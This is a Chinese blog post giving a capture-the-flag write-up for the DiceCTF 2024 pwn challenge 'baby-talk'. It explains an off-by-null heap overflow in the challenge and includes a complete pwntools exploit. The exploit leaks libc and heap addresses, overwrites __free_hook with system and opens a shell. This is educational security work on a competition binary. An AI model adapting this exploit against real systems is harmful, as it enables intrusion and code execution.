DiceCTF 2024 -- pwn

已于 2024-02-22 18:02:20 修改
阅读量440 收藏 10
点赞数 4
分类专栏: # 每日一“胖“ 文章标签: overwirte null
于 2024-02-22 17:43:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/136239050
版权

baby-talk

题目给了 Dockerfile,但由于笔者 docker 环境存在问题启动不起来,所以这里用虚拟机环境做了(没错,由于不知道远程 glibc 版本,所以笔者远程也没打通)笔者本地环境为 glibc 2.31-0ubuntu9.9。然后比赛结束,作者在 github 上给出了 libc 其版本为 2.27(乐,比赛不给…)

漏洞:溢出写 null 字节
在增加堆块时,写入内容后没有添加 \x00
在这里插入图片描述
由于上述写入时没有添加 \x00,所以这里导致可以向后溢出写 null 字节
在这里插入图片描述
举个例子就懂了:可以看到这里我们可以修改下一个堆块的 size 的低字节为 \x00 从而去 overlapping
在这里插入图片描述
漏洞利用:

  • 泄漏 libc_baseheap_base:这个比较简单,因为每次写入内容时没有添加 \x00,所以我们可以利用堆块上残余的地址进行 libc_baseheap_base 的泄漏
  • chunk overlapping 劫持 free_hook

exp 如下:

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

io = process("./chall")
#io = remote("mc.ax", 32526)
elf = ELF("./chall", checksec=False)
libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.31.so", checksec=False)

def debug():
        gdb.attach(io)
        pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b'> '

def add(size, string):
        sla(menu, b'1')
        sla(b'size? ', byte(size))
        sda(b'str? ', string)

def tok(idx, delim):
        sla(menu, b'2')
        sla(b'idx? ', byte(idx))
        sda(b'delim? ', delim)

def dele(idx):
        sla(menu, b'3')
        sla(b'idx? ', byte(idx))

add(0x410, b'A\n')
add(0x420, b'A\n')

dele(0)
add(0x420, b'A\n')

add(0x410, b'\n')
tok(2, b'\x00\n')
libc_base = addr8(6) - 0x1ecf0a
info("libc_base", libc_base)

dele(2)
dele(0)
add(0x420, b'A\n')
add(0x410, b'A'*0x10)
tok(2, b'\x00\n')
rut(b'A'*0x10)
heap_base = addr8(6) - 0x290
info("heap_base", heap_base)

dele(0)
dele(1)
dele(2)

add(0x20, p64(0) + p64(0x61) + p64(heap_base+0x290+0x10)*2)
add(0x18, b'A\n')
add(0x18, b'A\n')
add(0x4f8, b'A\n')
add(0x18, b'A\n')

dele(2)
add(0x18, b'A'*0x10 + b'\x60' + b'ABCDEFG')

tok(2, b'\x01\n')
tok(2, b'G\n')
tok(2, b'F\n')
tok(2, b'E\n')
tok(2, b'D\n')
tok(2, b'C\n')
tok(2, b'B\n')
tok(2, b'A\n')
dele(3)
dele(4)
dele(2)
add(0x50, b'A'*0x40 + p64(libc_base+libc.sym.__free_hook) + p64(heap_base+0x10))
add(0x10, b'/bin/sh\x00')
add(0x10, p64(libc_base+libc.sym.system))
dele(3)

#debug()
sh()

效果如下:
在这里插入图片描述
其它题目有点抽象就不看了…

XiaozaYa
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024NKCTF-pwn
03-25
2024NKCTF_pwn
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF:sctf_2019_easy_heap
weixin_51055545的博客
01-04 1289
例行检查一下程序: 64位的一道堆题,放到IDA中看下: 首先看到一个菜单:
dicectf2024 pwn
qq_62172019的博客
02-04 392
strtok函数在分割字符串的时候会将delim置为\x00这将导致前面的字符串在分割的时候把后面的堆块size某些字节置为\x00,因此可以利用这个漏洞打off by null。打完off by null向前合并之后就简单了直接控制tache块申请到free_hook直接改写就行。主办方虽然没有给libc但是给了题目所使用的dockerfile。本题使用的是Ubuntu18。查看函数,此处调用了strtok函数来分割字符串。也就是2.27版本的库。删除函数无uaf存在。
[DiceCTF 2022] interview-opportunity
fa1c4的blog
04-18 533
interview-opportunity int __cdecl main(int argc, const char **argv, const char **envp) { char buf[10]; // [rsp+6h] [rbp-1Ah] BYREF const char **v5; // [rsp+10h] [rbp-10h] int v6; // [rsp+1Ch] [rbp-4h] v6 = argc; v5 = argv; env_setup(argc, arg
Chrome v8 pwn
sky123博客
04-17 2631
它是⼀个多进程+IPC的程序, 不同的进程管理不同的内容,
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
磁力链磁力链磁力链.txt
最新发布
07-22
磁力链
“人力资源+大数据+薪酬报告+涨薪调薪”
07-22
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
安装graphviz和pygraphviz
07-22
pygraphviz 是一个Python库,它是Graphviz图形可视化软件的Python接口。Graphviz是一个开源的图形可视化软件,广泛用于创建和编辑有向图和无向图。pygraphviz使得Python开发者能够轻松地创建和操作图形,以及执行图形的布局和可视化。 一、pygraphviz的主要功能 创建和编辑图形:pygraphviz允许开发者通过Python代码来创建图形,包括添加节点、边等元素,并且可以编辑这些元素的属性,如颜色、形状、标签等。 图形布局:pygraphviz支持多种图形布局算法,如dot、neato、circo等,开发者可以根据需要选择合适的算法来优化图形的布局。 图形可视化:pygraphviz可以将创建和编辑好的图形保存为图片文件,支持多种图片格式,如PNG、JPEG等,方便开发者进行展示和分享。
BrainF**k Devlopment Toolkit
07-22
BrainF**k Devlopment Toolkit(BFDTK),可用于开发BrainF**k程序。
基于UC3875控制的大功率全桥开关电源设计(提供原理图、PCB图)
07-22
基于UC3875控制的大功率全桥开关电源设计(提供原理图、PCB图) 1、使用UC3875为控制芯片; 2、NCP1253为辅助电源设计,输出12V,给控制芯片供电; 3、UC3845做BOOST升压控制,实现市电整流升压到400V; 4、全桥拓扑设计结构; 5、后级输出同步整流设计; 6、过压硬件保护电路; 7、过流硬件保护电路; 8、提供原理图、PCB图;
毕业设计javajsp大学兼职信息网sqlserver-qp源码含文档工具包
07-22
毕业设计javajsp大学兼职信息网sqlserver-qp源码含文档工具包 页面是jsp,数据库sqlserver,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 (1)网站前台功能: A、信息搜索功能(分类检索) B、用户登录、注册 C、查看发布兼职信息 D、预定兼职 E、个人简历的编辑(也可以上传自己制作的简历) F、用户投诉 G、留言版 H、新闻公告(职场资讯) I、职场攻略(包含面试技巧以及简历指导) (2)管理员后台功能: A、用户信息管理
磁力链,Magnet2Torrent - 磁力链转种子利器
07-22
磁力链,Magnet2Torrent —— 磁力链转种子利器
mvn install jar in repository
07-22
maven将jar包安装到本地仓库的小工具,可批量导入,需配置好JAVA_HOME和MAVEN_HOME环境
巴比达内网穿透.docx
07-22
内网穿透,也被称为内网映射或NAT穿透,是一种网络技术,旨在实现位于不同局域网(内网)中的设备通过公网(外网)进行相互通信。以下是关于内网穿透的详细介绍: 一、定义与原理 定义:内网穿透是一种技术手段,通过该手段,内网(如公司局域网、家庭网络)中的设备能够被外网(如互联网)上的其他设备访问。 原理:内网穿透技术通常依赖于地址和端口的转换,以及在某些情况下,利用反向代理或隧道技术来打破内外网络的壁垒。具体来说,它可以将内网的IP地址和端口映射到公网上的一个地址和端口上,使得外网设备能够通过这个公网地址和端口来访问内网设备。 二、实现方式 内网穿透可以通过多种方式实现,包括但不限于以下几种: 端口映射:在路由器或防火墙上设置端口映射规则,将公网上的某个端口映射到内网设备的某个端口上。这种方式较为简单,但通常需要路由器具有端口映射功能。 反向代理:在内网中设置反向代理服务器,该服务器负责接收外网的请求,并将其转发到内网的目标设备上。反向代理服务器还可以处理内网设备对外网设备的响应,并将其转发回外网设备。 内网穿透软件:使用专门的内网穿透软件(如Frp、Ngrok、花生壳等),这些软件通常
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值